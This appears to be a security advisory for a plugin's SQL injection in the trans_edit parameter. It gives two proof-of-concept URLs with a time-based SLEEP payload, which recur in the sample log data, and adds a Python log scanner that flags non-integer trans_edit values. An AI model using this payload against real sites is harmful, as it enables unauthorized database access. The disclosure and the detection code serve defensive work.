The plugin does not sanitise and escape the trans_edit parameter before using it in a SQL statement when an agent edits a transaction, leading to an SQL injection.
As a logged in agent:
https://example.com/workstation/?transactions=open_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
https://example.com/workstation/?transactions=open_agent_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09
2022-05-12
2022-06-21
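
A detection sketch for the issue described above, added here and not part of the original advisory or the plugin's code: it scans web access logs for requests whose trans_edit value is anything other than a plain integer. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# A transaction id is expected to be a short decimal integer and nothing else.
VALID_ID_RE = re.compile(r"\d{1,10}")


def suspicious_trans_edit(log_line):
    """Return the decoded trans_edit value if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group("target")).query
    for key, value in parse_qsl(query):  # parse_qsl percent-decodes once
        if key != "trans_edit":
            continue
        # Decode a second time so double-encoded values (%2520) are still seen.
        decoded = unquote(value)
        if not VALID_ID_RE.fullmatch(decoded):
            return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_trans_edit(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample entries: one normal edit, the advisory's request, one page view.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/May/2022:10:00:01 +0000] "GET /workstation/'
    '?transactions=open_transactions&trans_edit=17 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [09/May/2022:10:00:09 +0000] "GET /workstation/'
    '?transactions=open_transactions&trans_edit=1%20AND%20(SELECT%2042%20FROM'
    '%20(SELECT(SLEEP(5)))b) HTTP/1.1" 200 5120',
    '198.51.100.4 - - [09/May/2022:10:01:30 +0000] "GET /workstation/'
    '?transactions=open_agent_transactions HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer trans_edit value: {value!r}")
```

Flagged entries are worth correlating with response times, since the request in the advisory is time-based and leaves no difference in status code or response size.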